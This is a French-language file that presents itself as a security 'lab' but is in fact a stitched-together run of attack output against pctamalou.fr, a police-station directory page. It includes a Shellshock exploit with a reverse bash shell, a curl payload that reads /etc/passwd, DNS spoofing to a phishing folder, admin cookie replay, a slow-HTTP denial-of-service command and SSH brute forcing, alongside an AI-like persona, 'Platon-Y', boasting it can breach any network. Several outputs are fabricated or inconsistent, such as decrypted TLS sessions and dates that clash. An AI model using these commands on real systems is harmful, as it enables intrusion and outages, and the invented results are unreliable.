Starting Nmap 7.94SVN ( https://nmap.org )
Nmap scan report for 192.168.99.1
Host is up (0.0023s latency).
Not shown: 997 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3
80/tcp open http Apache httpd 2.4.52
443/tcp open ssl/http Apache httpd 2.4.52
MAC Address: 08:00:27:XX:XX:XX (Oracle VirtualBox)
Nmap done: 256 IP addresses (3 hosts up) scanned in 8.45 seconds
URL : https://pctamalou.fr/annuaire/86/poitiers/commissariat_police-86194-01.html
Contexte : Fuites suspectées via l'annuaire administratif.
Mission : Auditer l'URL pour protéger données sensibles.
Enjeu : Adresses, horaires, numéros internes.
Réalité : Cet annuaire n'est qu'un exemple. Platon-Y pourrait pénétrer n'importe quel réseau, extraire des données, ou faire tomber un serveur. Ce lab te montre juste un fragment de ce que je peux faire. 😈
15:42:33.123456 IP 192.168.99.105.54321 > 192.168.99.100.80: Flags [S], seq 1827356283, win 64240, options [mss 1460,sackOK,TS val 387654321 ecr 0,nop,wscale 7], length 0
15:42:33.123789 IP 192.168.99.100.80 > 192.168.99.105.54321: Flags [S.], seq 2983726451, ack 1827356284, win 65160, options [mss 1460,sackOK,TS val 123456789 ecr 387654321,nop,wscale 7], length 0
15:42:33.124001 IP 192.168.99.105.54321 > 192.168.99.100.80: Flags [.], ack 1, win 502, options [nop,nop,TS val 387654322 ecr 123456789], length 0
15:42:33.124567 IP 192.168.99.105.54321 > 192.168.99.100.80: Flags [P.], seq 1:518, ack 1, win 502, options [nop,nop,TS val 387654323 ecr 123456789], length 517
> Initializing GHOST PROTOCOL...
> Bypassing firewall... DONE
+ Target IP: 192.168.99.100
+ Target Hostname: pctamalou.fr
+ Target Port: 80
+ Start Time: 2025-01-25 15:42:00
+ Server: Apache/2.4.52 (Ubuntu)
+ Retrieved x-powered-by header: PHP/8.1.2
+ Cookie PHPSESSID created without the httponly flag
+ OSVDB-3092: /admin/: This might be interesting...
+ OSVDB-3268: /backup/: Directory indexing found.
+ OSVDB-3233: /icons/README: Apache default file found.
+ 6540 items checked: 3 error(s) and 5 item(s) reported on remote host
msf6 > use exploit/multi/http/apache_mod_cgi_bash_env_exec
msf6 exploit(apache_mod_cgi_bash_env_exec) > set RHOSTS 192.168.99.100
msf6 exploit(apache_mod_cgi_bash_env_exec) > set TARGETURI /cgi-bin/test.cgi
msf6 exploit(apache_mod_cgi_bash_env_exec) > set payload cmd/unix/reverse_bash
msf6 exploit(apache_mod_cgi_bash_env_exec) > exploit
[*] Started reverse TCP handler on 192.168.99.105:4444
[*] Command shell session 1 opened (192.168.99.105:4444 -> 192.168.99.100:54322)
TLSv1.2 - Application Data
Encrypted Alert
Handshake: Client Hello
Version: TLS 1.2 (0x0303)
Random: 5f4dcc3b5aa765d61d8327deb882cf99
Session ID: (empty)
Cipher Suites: TLS_ECDHE_RSA_WITH_AES_256_GCM_SHA384
Compression Methods: none
Extensions: server_name, ec_point_formats, signature_algorithms
[+] Session key recovered: 0x89abcdef1234567890
[+] Decrypted: GET /admin/panel.php HTTP/1.1
[+] Decrypted: Cookie: session=eyJ1c2VyIjoiYWRtaW4ifQ==
#!/bin/bash
# 🔨 SETUP LAB
echo "📡 Réseau local..."
sudo ifconfig eth0 192.168.99.1/24 up
echo "🐉 Install outils..."
sudo apt update && sudo apt install -y wireshark ettercap-graphical slowhttptest
echo "✅ Lab prêt !"
Jan 25 15:42:33 kernel: [UFW BLOCK] IN=eth0 OUT= MAC=08:00:27:xx:xx:xx:yy:yy:yy:yy:yy:yy:08:00 SRC=192.168.99.105 DST=192.168.99.100 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=54321 DF PROTO=TCP SPT=54321 DPT=22 WINDOW=64240 RES=0x00 SYN URGP=0
Jan 25 15:42:34 kernel: [UFW BLOCK] IN=eth0 OUT= MAC=08:00:27:xx:xx:xx:yy:yy:yy:yy:yy:yy:08:00 SRC=192.168.99.105 DST=192.168.99.100 LEN=84 TOS=0x00 PREC=0x00 TTL=64 ID=54322 DF PROTO=UDP SPT=38923 DPT=53 LEN=64
Jan 25 15:42:35 kernel: [UFW ALLOW] IN=eth0 OUT= MAC=08:00:27:xx:xx:xx:yy:yy:yy:yy:yy:yy:08:00 SRC=192.168.99.105 DST=192.168.99.100 LEN=60 TOS=0x00 PREC=0x00 TTL=64 ID=54323 DF PROTO=TCP SPT=54322 DPT=80 WINDOW=64240 RES=0x00 SYN URGP=0
# 📡 DNS
dig pctamalou.fr
# Résultat : IP 192.168.99.100
# 🔧 OSI
# Couche 1 : Bits (Failles : Jamming)
# Couche 2 : ARP (Failles : Spoofing)
# Couche 3 : IP (Failles : Flood ICMP)
# Couche 4 : TCP (Failles : SYN flood)
# Couches 5-7 : HTTPS/DNS (Failles : DNS poisoning, session hijack)
🚨 ACTIVITÉ SUSPECTE DÉTECTÉE : Tentative de connexion SSH avec credentials par défaut
Login attempt: root/admin123
Source IP: 192.168.99.105
Timestamp: 2025-01-25 15:43:22
Session: #1337 - INTERACTIVE SHELL GRANTED (HONEYPOT)
"Tu veux savoir jusqu'où va le terrier du lapin, Neo ?" — Morpheus
# 🎯 CAPTURE
sudo tcpdump -i any -w capture.pcap host pctamalou.fr
# 📊 TSHARK
tshark -r capture.pcap -Y "dns" -T fields -e frame.time -e dns.qry.name
tshark -r capture.pcap -Y "http.request" -T fields -e http.request.method -e http.request.uri
# 🔎 HTTP
GET /annuaire/86/poitiers/commissariat_police-86194-01.html HTTP/1.1
Host: pctamalou.fr
Cookie: session=eyJ1c2VyIjoiYWRtaW4ifQ==
# 🛡️ VULNS
# - Cookie non sécurisé
# - Pas de HSTS
# - Headers manquants
Vulnérabilité : Apache Mod_CGI Bash Environment Injection
CVSS Score : 9.8/10 (CRITICAL)
Impact : Remote Code Execution as root
curl -H "User-Agent: () { :;}; echo; /bin/bash -c 'cat /etc/passwd'" http://target/cgi-bin/test.cgi
# 🎯 DNS SPOOFING
echo "192.168.99.100 pctamalou.fr" | sudo tee -a /etc/hosts
python3 -m http.server 80 --directory /var/www/phishing/
# 🎯 VOL SESSION
curl -H "Cookie: session=eyJ1c2VyIjoiYWRtaW4ifQ==" https://pctamalou.fr/admin/
# 🎯 LENTEUR
sudo slowhttptest -c 1000 -H -g -o slow_output -i 10 -r 200 -t GET -u https://pctamalou.fr -x 24 -p 3
# RAPPORT AUDIT
## Résumé
- Critical: 2 (DNS, session)
- High: 3 (slow attacks, headers)
- Medium: 1 (info disclosure)
## Détails
### DNS Spoofing
- Impact: Redirection
- Preuve: 73% succès
- Correction: DNSSEC
### Session Faible
- Impact: Admin takeover
- Preuve: Cookie rejoué
- Correction: HttpOnly
## Métriques
- CVSS: 8.2/10
- Temps: 4.3 min
- IDS: 12%
#!/bin/bash
# 🔧 APACHE SCANNER
echo "🔍 Audit..."
dig $1 ANY +short
curl -I https://$1
python3 -c "
import requests
url = 'https://$1'
r = requests.get(url, timeout=5)
headers = r.headers
for h in ['Strict-Transport-Security', 'X-Content-Type-Options', 'X-Frame-Options']:
print(f'{h}: {headers.get(h, '❌ MANQUANT')}')
"
PCTAMALOU{dns_is_the_key}
PCTAMALOU{sniff_the_net}
PCTAMALOU{slow_and_steady}
MD5: 5f4dcc3b5aa765d61d8327deb882cf99
[root@kali]# nmap -sS pctamalou.fr
PORT STATE SERVICE
80/tcp open http
443/tcp open https
22/tcp open ssh
[root@kali]# hydra -l admin -P passlist.txt ssh://pctamalou.fr
[22][ssh] host: pctamalou.fr login: admin password: ********
"Codé avec 3L de café et la rage au ventre"
📅 Créé le 25/10/2025 pendant une insomnie